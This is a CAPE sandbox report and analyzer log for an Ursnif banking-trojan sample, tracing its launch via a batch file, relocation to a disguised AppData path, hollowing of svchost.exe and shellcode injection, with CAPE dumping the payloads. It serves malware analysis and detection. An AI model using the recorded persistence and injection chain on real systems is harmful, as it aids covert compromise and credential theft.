CAPE

Detections: Ursnif Triggered CAPE Tasks: Task #131470: Ursnif


Analysis

Category Package Started Completed Duration Options Log
FILE Injection 2020-03-24 09:47:01 2020-03-24 09:50:48 227 seconds Show Options Show Log
route = internet
procdump = 0
2020-03-24 09:47:05,000 [root] INFO: Date set to: 03-24-20, time set to: 09:47:05, timeout set to: 200
2020-03-24 09:47:05,030 [root] DEBUG: Starting analyzer from: C:\xkrjyge
2020-03-24 09:47:05,030 [root] DEBUG: Storing results at: C:\gGNnZRIY
2020-03-24 09:47:05,030 [root] DEBUG: Pipe server name: \\.\PIPE\PgWoVOst
2020-03-24 09:47:05,030 [root] INFO: Analysis package "Injection" has been specified.
2020-03-24 09:47:06,325 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:47:06,341 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:47:06,341 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:47:07,510 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:47:07,510 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:47:07,526 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:47:07,605 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:47:07,605 [root] INFO: Analyzer: DLL set to Injection.dll from package modules.packages.Injection
2020-03-24 09:47:07,605 [root] INFO: Analyzer: DLL_64 set to Injection_x64.dll from package modules.packages.Injection
2020-03-24 09:47:07,635 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe" with arguments "" with pid 3064
2020-03-24 09:47:07,635 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:07,635 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:07,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:07,667 [root] DEBUG: Loader: Injecting process 3064 (thread 872) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:07,667 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:07,667 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:07,667 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3064
2020-03-24 09:47:09,680 [lib.api.process] INFO: Successfully resumed process with pid 3064
2020-03-24 09:47:09,680 [root] INFO: Added new process to list with pid: 3064
2020-03-24 09:47:09,881 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:09,898 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:10,023 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:10,023 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 3064 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:10,038 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe".
2020-03-24 09:47:10,038 [root] INFO: Monitor successfully loaded in process with pid 3064.
2020-03-24 09:47:10,085 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xc4 amd local view 0x035F0000 to global list ().
2020-03-24 09:47:10,148 [root] DEBUG: DLL loaded at 0x74780000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:10,413 [root] DEBUG: set_caller_info: Adding region at 0x004D0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:10,460 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:10,584 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:10,631 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:10,631 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 3064, handle 0x100.
2020-03-24 09:47:10,631 [root] DEBUG: OpenProcessHandler: Image base for process 3064 (handle 0x100): 0x00400000.
2020-03-24 09:47:21,769 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:47:21,769 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0x104.
2020-03-24 09:47:21,815 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 3064, image base 0x00400000.
2020-03-24 09:47:21,832 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:47:21,832 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:47:21,832 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\3064_6435005442171924232020
2020-03-24 09:47:21,848 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:47:21,848 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:47:21,848 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 3064.
2020-03-24 09:47:21,848 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 3064.
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x74680000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x744E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:47:21,940 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:47:22,035 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:47:22,065 [root] DEBUG: DLL loaded at 0x744D0000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:47:22,112 [root] DEBUG: DLL unloaded from 0x75B20000.
2020-03-24 09:47:22,112 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:22,331 [root] DEBUG: DLL loaded at 0x74470000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:47:22,517 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:47:22,829 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:47:22,877 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:47:23,470 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1016
2020-03-24 09:47:23,470 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,470 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,486 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,486 [root] DEBUG: Loader: Injecting process 1016 (thread 3036) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,486 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:23,486 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,486 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1016
2020-03-24 09:47:23,486 [root] DEBUG: CreateProcessHandler: using lpCommandLine: "C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE".
2020-03-24 09:47:23,486 [root] DEBUG: CreateProcessHandler: Injection info set for new process 1016, ImageBase: 0x4A4F0000
2020-03-24 09:47:23,486 [root] INFO: Announced 32-bit process name: cmd.exe pid: 1016
2020-03-24 09:47:23,500 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,500 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,500 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,500 [root] DEBUG: Loader: Injecting process 1016 (thread 3036) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,500 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,500 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,516 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:23,516 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,516 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1016
2020-03-24 09:47:23,516 [root] DEBUG: DLL unloaded from 0x75530000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x75B20000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x74470000.
2020-03-24 09:47:23,532 [root] DEBUG: DLL unloaded from 0x74680000.
2020-03-24 09:47:23,532 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:23,548 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:23,548 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:23,563 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:23,563 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 1016 at 0x747a0000, image base 0x4a4f0000, stack from 0x83000-0x180000
2020-03-24 09:47:23,563 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"".
2020-03-24 09:47:23,563 [root] INFO: Added new process to list with pid: 1016
2020-03-24 09:47:23,563 [root] INFO: Monitor successfully loaded in process with pid 1016.
2020-03-24 09:47:23,595 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xdc amd local view 0x03C40000 to global list ().
2020-03-24 09:47:23,595 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2888
2020-03-24 09:47:23,609 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,609 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,609 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,609 [root] DEBUG: Loader: Injecting process 2888 (thread 2572) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,609 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,609 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,625 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:23,625 [root] DEBUG: DLL unloaded from 0x75700000.
2020-03-24 09:47:23,625 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,625 [root] DEBUG: DLL unloaded from 0x74BB0000.
2020-03-24 09:47:23,625 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2888
2020-03-24 09:47:23,625 [root] INFO: Notified of termination of process with pid 3064.
2020-03-24 09:47:23,625 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:23,734 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2888, ImageBase: 0x4A4F0000
2020-03-24 09:47:23,734 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2888
2020-03-24 09:47:23,750 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,750 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,782 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,798 [root] DEBUG: Loader: Injecting process 2888 (thread 2572) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,798 [root] DEBUG: Process image base: 0x4A4F0000
2020-03-24 09:47:23,812 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,812 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:23,828 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:23,828 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2888
2020-03-24 09:47:23,844 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:23,859 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:23,875 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:23,875 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:23,891 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 2888 at 0x747a0000, image base 0x4a4f0000, stack from 0x363000-0x460000
2020-03-24 09:47:23,891 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE"".
2020-03-24 09:47:23,891 [root] INFO: Added new process to list with pid: 2888
2020-03-24 09:47:23,891 [root] INFO: Monitor successfully loaded in process with pid 2888.
2020-03-24 09:47:23,907 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xe0 amd local view 0x03BC0000 to global list ().
2020-03-24 09:47:23,907 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2980
2020-03-24 09:47:23,937 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:23,937 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:23,953 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:23,984 [root] DEBUG: Loader: Injecting process 2980 (thread 2512) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,016 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:24,016 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,016 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:47:24,046 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,046 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2980
2020-03-24 09:47:24,062 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:47:24,094 [root] DEBUG: CreateProcessHandler: Injection info set for new process 2980, ImageBase: 0x00400000
2020-03-24 09:47:24,109 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 2980
2020-03-24 09:47:24,109 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:47:24,109 [lib.api.process] INFO: 32-bit DLL to inject is C:\xkrjyge\dll\sdypyhH.dll, loader C:\xkrjyge\bin\VbXIlNS.exe
2020-03-24 09:47:24,141 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:47:24,155 [root] DEBUG: Loader: Injecting process 2980 (thread 2512) with C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,171 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:47:24,171 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,187 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:47:24,187 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\sdypyhH.dll.
2020-03-24 09:47:24,187 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2980
2020-03-24 09:47:24,203 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:47:24,203 [root] DEBUG: Process dumps disabled.
2020-03-24 09:47:24,219 [root] INFO: Disabling sleep skipping.
2020-03-24 09:47:24,219 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:47:24,233 [root] DEBUG: CAPE initialised: 32-bit Injection package loaded in process 2980 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:47:24,233 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE".
2020-03-24 09:47:24,250 [root] INFO: Added new process to list with pid: 2980
2020-03-24 09:47:24,250 [root] INFO: Monitor successfully loaded in process with pid 2980.
2020-03-24 09:47:24,250 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x035F0000 to global list ().
2020-03-24 09:47:24,250 [root] DEBUG: DLL loaded at 0x74B20000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:47:24,546 [root] DEBUG: set_caller_info: Adding region at 0x03A80000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:47:24,608 [root] DEBUG: set_caller_info: Adding region at 0x002F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:47:24,608 [root] DEBUG: DLL loaded at 0x758B0000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:47:24,640 [root] DEBUG: DLL loaded at 0x76A40000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:47:24,655 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: DLL loaded at 0x76770000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:47:24,671 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 2980, handle 0xfc.
2020-03-24 09:47:24,671 [root] DEBUG: OpenProcessHandler: Image base for process 2980 (handle 0xfc): 0x00400000.
2020-03-24 09:48:17,273 [root] DEBUG: DLL loaded at 0x76DD0000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:48:17,273 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0x100.
2020-03-24 09:48:17,305 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 2980, image base 0x00400000.
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:48:17,321 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_20931482251781924232020
2020-03-24 09:48:17,321 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:48:17,336 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:17,336 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 2980.
2020-03-24 09:48:17,336 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 2980.
2020-03-24 09:48:17,336 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1308
2020-03-24 09:48:17,351 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:17,351 [lib.api.process] INFO: 64-bit DLL to inject is C:\xkrjyge\dll\XfVPsKv.dll, loader C:\xkrjyge\bin\ACICoeBS.exe
2020-03-24 09:48:17,368 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:48:17,368 [root] DEBUG: Loader: Injecting process 1308 (thread 3060) with C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,368 [root] DEBUG: Process image base: 0x00000000FF8E0000
2020-03-24 09:48:17,398 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,414 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:48:17,414 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,414 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1308
2020-03-24 09:48:17,414 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:48:17,430 [root] DEBUG: CreateProcessHandler: using lpCommandLine: C:\Windows\system32\svchost.exe.
2020-03-24 09:48:17,446 [root] DEBUG: CreateProcessHandler: Injection info set for new process 1308, ImageBase: 0xFF8E0000
2020-03-24 09:48:17,446 [root] INFO: Announced 64-bit process name: svchost.exe pid: 1308
2020-03-24 09:48:17,446 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:17,446 [lib.api.process] INFO: 64-bit DLL to inject is C:\xkrjyge\dll\XfVPsKv.dll, loader C:\xkrjyge\bin\ACICoeBS.exe
2020-03-24 09:48:17,461 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:48:17,476 [root] DEBUG: Loader: Injecting process 1308 (thread 3060) with C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,493 [root] DEBUG: Process image base: 0x00000000FF8E0000
2020-03-24 09:48:17,507 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,507 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:48:17,507 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:17,507 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1308
2020-03-24 09:48:17,523 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 1308, image base 0xFF8E0000.
2020-03-24 09:48:17,539 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0xFF8E0000.
2020-03-24 09:48:17,539 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000246C.
2020-03-24 09:48:17,571 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_13548867563781924232020
2020-03-24 09:48:17,601 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2020-03-24 09:48:17,601 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:17,601 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1308.
2020-03-24 09:48:17,601 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1308.
2020-03-24 09:48:17,601 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:48:17,618 [root] DEBUG: Process dumps disabled.
2020-03-24 09:48:17,632 [root] INFO: Disabling sleep skipping.
2020-03-24 09:48:17,648 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:48:17,664 [root] WARNING: Unable to hook LockResource
2020-03-24 09:48:17,680 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:48:17,696 [root] DEBUG: CAPE initialised: 64-bit Injection package loaded in process 1308 at 0x0000000074660000, image base 0x00000000FF8E0000, stack from 0x0000000000225000-0x0000000000230000
2020-03-24 09:48:17,696 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2020-03-24 09:48:17,696 [root] INFO: Added new process to list with pid: 1308
2020-03-24 09:48:17,696 [root] INFO: Monitor successfully loaded in process with pid 1308.
2020-03-24 09:48:17,742 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x16c amd local view 0x01F30000 to global list ().
2020-03-24 09:48:17,742 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x16c to target process 1308 ().
2020-03-24 09:48:17,757 [root] DEBUG: WriteMemoryHandler: shellcode at 0x043D71B8 (size 0x318) injected into process 1308.
2020-03-24 09:48:17,773 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\gGNnZRIY\CAPE\2980_51891963781924232020
2020-03-24 09:48:17,773 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_51891963781924232020
2020-03-24 09:48:17,789 [root] DEBUG: WriteMemoryHandler: Dumped injected code/data from buffer.
2020-03-24 09:48:17,805 [root] DEBUG: UnmapSectionViewHandler: Attempt to unmap view at 0x01F30000, dumping.
2020-03-24 09:48:17,805 [root] DEBUG: DumpPEsInRange: Scanning range 0x1f30000 - 0x1fe0000.
2020-03-24 09:48:17,805 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1f30000
2020-03-24 09:48:17,819 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:17,835 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:17,867 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x01F30000.
2020-03-24 09:48:17,867 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001644.
2020-03-24 09:48:17,882 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_12866117363781924232020
2020-03-24 09:48:17,898 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d000.
2020-03-24 09:48:17,898 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x1f30000.
2020-03-24 09:48:17,914 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1f59e07)
2020-03-24 09:48:17,930 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1f59e07)
2020-03-24 09:48:17,960 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1f59d77)
2020-03-24 09:48:17,960 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1f59d77)
2020-03-24 09:48:17,976 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1f71b8c
2020-03-24 09:48:17,992 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x1f71b8c.
2020-03-24 09:48:18,007 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:18,007 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x043E0020.
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001406.
2020-03-24 09:48:18,007 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_575675203881924232020
2020-03-24 09:48:18,007 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2f400.
2020-03-24 09:48:18,023 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x43e0020.
2020-03-24 09:48:18,069 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x1fa1b8c
2020-03-24 09:48:18,085 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x1fa1b8c.
2020-03-24 09:48:18,085 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:18,101 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
